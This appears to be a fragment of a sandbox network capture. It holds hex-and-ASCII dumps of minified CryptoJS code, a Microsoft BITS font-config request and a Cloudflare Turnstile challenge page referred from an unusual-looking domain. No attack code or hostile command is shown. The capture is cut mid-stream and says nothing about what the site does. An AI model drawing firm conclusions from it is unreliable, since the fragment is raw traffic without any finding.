globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cr
2024-10-30 15:05:35 UTC	1369	IN	Data Raw: 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 Data Ascii: .call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomByte
2024-10-30 15:05:35 UTC	1369	IN	Data Raw: 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c Data Ascii: ypeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4o),c=(s=t?h.ceil(s):h.max((0\|s)-this._minBufferSize,0))o,n=h.min(4*c,n);if(c){for(var a=0;a<
2024-10-30 15:05:35 UTC	1369	IN	Data Raw: 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e Data Ascii: (var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b\|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)\|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)\|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)\|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>
2024-10-30 15:05:35 UTC	1369	IN	Data Raw: 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b Data Ascii: ;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((nn>>>17)+no>>>15)+oo^((4294901760&i)i\|0)+((65535&i)*i\|0)}t[0]=I[0]+(I[7]<<16\|I[7]>>>16)+(I[6]<<16\|I[6]>>>16)\|0,t[1]=I[1]+(I[0]<<8\|I[0]>>>24)+I[7]\|0,t[2]=I[2]+(I[1]<<16\|I[1]>>>16)+(I[0]<<16\|I[
2024-10-30 15:05:35 UTC	1369	IN	Data Raw: 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a Data Ascii: er,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]\|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:
2024-10-30 15:05:35 UTC	1369	IN	Data Raw: 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f Data Ascii: charAt(64);return!o\|\|-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%42,c=r[t.charCodeAt(o)]>>>6-o%42,c=s\|c,i[n>>>2]\|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNO
2024-10-30 15:05:35 UTC	1369	IN	Data Raw: 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 Data Ascii: (a.sin(t+1))\|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8\|n>>>24)\|4278255360&(n<<24\|n>>>8)}var o=th
2024-10-30 15:05:35 UTC	1369	IN	Data Raw: 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c Data Ascii: ]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:35 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-10-30 15:05:35 UTC	514	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=25984 Date: Wed, 30 Oct 2024 15:05:35 GMT Content-Length: 55 Connection: close X-CID: 2
2024-10-30 15:05:35 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:35 UTC	801	OUT	GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/bwuv1/0x4AAAAAAAxPQeoKC444sp2r/auto/fbE/normal/auto/ HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://rpbr.ithbetoxi.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:35 UTC	1362	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 15:05:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 26447 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self' cross-origin-embedder-policy: require-corp cross-origin-opener-policy: same-origin cross-origin-resource-policy: cross-origin origin-agent-cluster: ?1 accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA referrer-policy: same-origin document-policy: js-profiling
2024-10-30 15:05:35 UTC	82	IN	Data Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 61 63 34 64 65 64 65 64 62 37 34 36 35 34 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: Server: cloudflareCF-RAY: 8dac4dededb74654-DFWalt-svc: h3=":443"; ma=86400
2024-10-30 15:05:35 UTC	1294	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
2024-10-30 15:05:35 UTC	1369	IN	Data Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
2024-10-30 15:05:35 UTC	1369	IN	Data Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23 Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
2024-10-30 15:05:35 UTC	1369	IN	Data Raw: 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d Data Ascii: enge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challenge-
2024-10-30 15:05:35 UTC	1369	IN	Data Raw: 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 Data Ascii: k .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop-li
2024-10-30 15:05:35 UTC	1369	IN	Data Raw: 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 7d 74 6f 7b 66 69 6c 6c 3a 23 Data Ascii: ffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1303}to{fill:#
2024-10-30 15:05:35 UTC	1369	IN	Data Raw: 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 7b 68 65 Data Ascii: flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-compact #logo{he
2024-10-30 15:05:35 UTC	1369	IN	Data Raw: 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 6a 75 73 74 69 Data Ascii: .rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl 